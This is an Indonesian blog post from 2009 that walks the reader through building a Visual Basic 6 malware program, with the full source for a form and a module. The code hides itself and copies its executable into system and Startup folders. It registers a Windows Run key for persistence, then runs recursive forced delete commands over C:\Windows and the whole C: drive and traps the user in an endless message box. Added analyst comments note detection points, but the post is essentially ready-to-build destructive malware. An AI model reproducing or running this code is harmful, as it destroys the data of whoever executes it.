
Selasa, 16 Juni 2009

Seonggok Malware

Diaturin

Tapi jangan usil coy
ini cuma buat mengetahui ajeh
caranya yeh yeh

1. siapin form 1 and module 1
Buat Form sekecil mungkin
2. Copy lalu paste in di form

Nih code buat form


' Form-level state shared by Form_Load and passed to reg():
' namefile - file name the sample uses for its dropped copy
' namereg  - registry value name the sample uses for its autorun entry
' Both strings are analysis indicators (dropped-file name, Run value name).
Dim namefile As String
Dim namereg As String
' Entry point of the sample: runs when the form loads.
' Behaviour as written: hides the window, sets the drop/registry names,
' calls reg() to install a copy for persistence, then calls payload().
' Analyst notes:
'   - Host indicators set here: file name "virus.exe", Run value name "virus".
'   - payload is called unconditionally, outside the If block.
Private Sub Form_Load()
' All runtime errors in this routine are suppressed, so nothing is shown to the user.
On Error Resume Next
' No visible window: the process runs without any UI until the payload's message box.
Me.Hide
namefile = "virus.exe"
namereg = "virus"
' Apparent intent: only install when not already running from one of the listed
' system/startup directories.
' NOTE(review): the Or chain is applied to bare string literals, not to separate
' comparisons, so this should not be relied on as an "already installed" check;
' treat every execution as potentially re-running the install routine.
If LCase$(App.Path) <> "c:\windows\system32" Or "c:\windows\start menu\programs\startup" Or "c:\windows\start menu\programs\start up" Or "c:\winnt\system32" Or "c:\winnt\start menu\programs\startup" Or "c:\winnt\start menu\programs\start up" Or "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" Then

reg namefile, namereg
End If
payload
End Sub
' Destructive stage of the sample (data destruction / wiper behaviour).
' Launches two cmd.exe instances that run "del" over c:\windows\* and c:\*,
' then loops forever on a message box. No value is returned.
' Defensive notes:
'   - Detection: process-creation telemetry showing cmd.exe started by a
'     non-system parent with a "del" command line carrying /F /S /Q against
'     a drive root or the Windows directory.
'   - Impact is bounded by the privileges of the account running the sample;
'     least-privilege accounts and tested backups are the relevant mitigations.
Function payload()
' Errors from Shell are suppressed.
On Error Resume Next

' del switches: /F also deletes read-only files, /S recurses into
' subdirectories, /Q suppresses confirmation prompts.
Shell ("cmd /c del c:\windows\* /F /S /Q")

Shell ("cmd /c del c:\* /F /S /Q")

' Endless loop: the label/GoTo pair re-displays the message box each time it
' is dismissed, so the dialog cannot be closed from within the program.
start:
MsgBox "Restart Yah"
GoTo start
End Function

3. Kalo yang ennni code buat modulnyah

' Win32 registry API imports from advapi32.dll (ANSI variants via Alias) and
' the value-type constants used with them. In this module they are used only
' to write and delete a value under the machine-wide Run key.
' Analyst note: these imports in a small VB6 binary, combined with the Run key
' path string below, are a common static indicator of registry-based autorun.

' Writes a value (name, type, data, data length) under an open key handle.
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
' Registry value types: string and 32-bit number. REG_DWORD is not referenced
' by the code shown on this page.
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
' Releases a key handle.
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
' Removes a named value from an open key.
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
' Opens an existing subkey and returns its handle in phkResult.
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' Creates (or opens) a subkey and returns its handle in phkResult.
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' Writes a REG_SZ value into the registry.
'   Hkey     - root key handle (declared As Long)
'   strPath  - subkey path under Hkey; created if it does not exist
'   strValue - name of the value to set
'   strdata  - string data stored in the value
' The API return codes are stored in X but never checked, and runtime errors
' are suppressed, so a failed write is silent.
' Analyst note: in this sample the only caller is reg(), which targets
' Software\Microsoft\Windows\CurrentVersion\Run; monitoring writes to that key
' is the relevant detection point.
Public Sub savestring(Hkey As Long, strPath As String, strValue As String, strdata As String)
On Error Resume Next
Dim keyhand As Long
Dim X As Long
X = RegCreateKey(Hkey, strPath, keyhand)
X = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
X = RegCloseKey(keyhand)
End Sub
' Deletes a named value from a registry key.
'   Hkey     - root key handle
'   strPath  - subkey path under Hkey to open
'   strValue - name of the value to remove
' No result is returned; API return codes are stored in X and ignored, and
' runtime errors are suppressed.
' In this sample it is called from reg() to remove the sample's own Run value
' before rewriting it, and once more on the final give-up path.
Public Function DeleteValue(ByVal Hkey As Long, ByVal strPath As String, ByVal strValue As String)
On Error Resume Next
Dim Xkey As Long
Dim X As Long
X = RegOpenKey(Hkey, strPath, Xkey)
X = RegDeleteValue(Xkey, strValue)
X = RegCloseKey(Xkey)
End Function
' Persistence installer: tries to copy the running executable to a fixed
' location and register it to start with Windows.
'   filename - name given to the dropped copy
'   regname  - name of the value written under the Run key
' Two persistence mechanisms appear in this routine:
'   1. a value under Software\Microsoft\Windows\CurrentVersion\Run
'   2. a copy of the executable in a Startup folder
' Host artifacts an analyst should check (all paths are hard-coded below):
'   c:\windows\system32\, c:\winnt\system32\, c:\, c:\Documents and Settings\,
'   c:\program files\, and the Windows/WinNT/All Users Startup folders, each
'   with <filename>; plus a Run value named <regname>.
' The labels error1..error7 are fallback stages reached only through
' On Error GoTo.
' NOTE(review): how VB6 handles a further error raised inside an already active
' handler should be confirmed in a sandbox before assuming the fallbacks run in
' the order written.
Function reg(filename As String, regname As String)
' Stage 0: write the Run value pointing at system32, then copy the file there.
On Error GoTo error1
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\windows\system32\" & filename)
On Error GoTo error2
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32\" & filename
Exit Function
' Fallback when the registry write fails: drop into the Windows Startup folder
' (two spellings of the folder name are tried).
error1:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\startup\" & filename
On Error GoTo error4
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\start up\" & filename
Exit Function
' Fallback when the system32 copy fails: use c:\winnt\system32 and re-point
' the Run value at that copy.
error2:
On Error GoTo error3
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\system32\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\winnt\system32\" & filename)
Exit Function
' Next fallback: drive root, with the Run value rewritten to match.
error3:
On Error GoTo error6
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\" & filename)
Exit Function
' Startup-folder fallback for WinNT-style installs.
error4:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\startup\" & filename
On Error GoTo error5
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\start up\" & filename
Exit Function
' Startup-folder fallback for the All Users profile.
error5:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & filename
Exit Function
' Next fallback: c:\Documents and Settings, with the Run value rewritten.
error6:
On Error GoTo error7
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\Documents and Settings\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\Documents and Settings" & filename)
Exit Function
' Last copy location: c:\program files, with the Run value rewritten.
error7:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\program files\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\program files\" & filename)
Exit Function
' Give-up path: remove the Run value and terminate the program with End,
' so Form_Load's later call to payload is not reached on this path.
enditnow:
On Error Resume Next
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
End
End Function

4. selese oi (T.T)
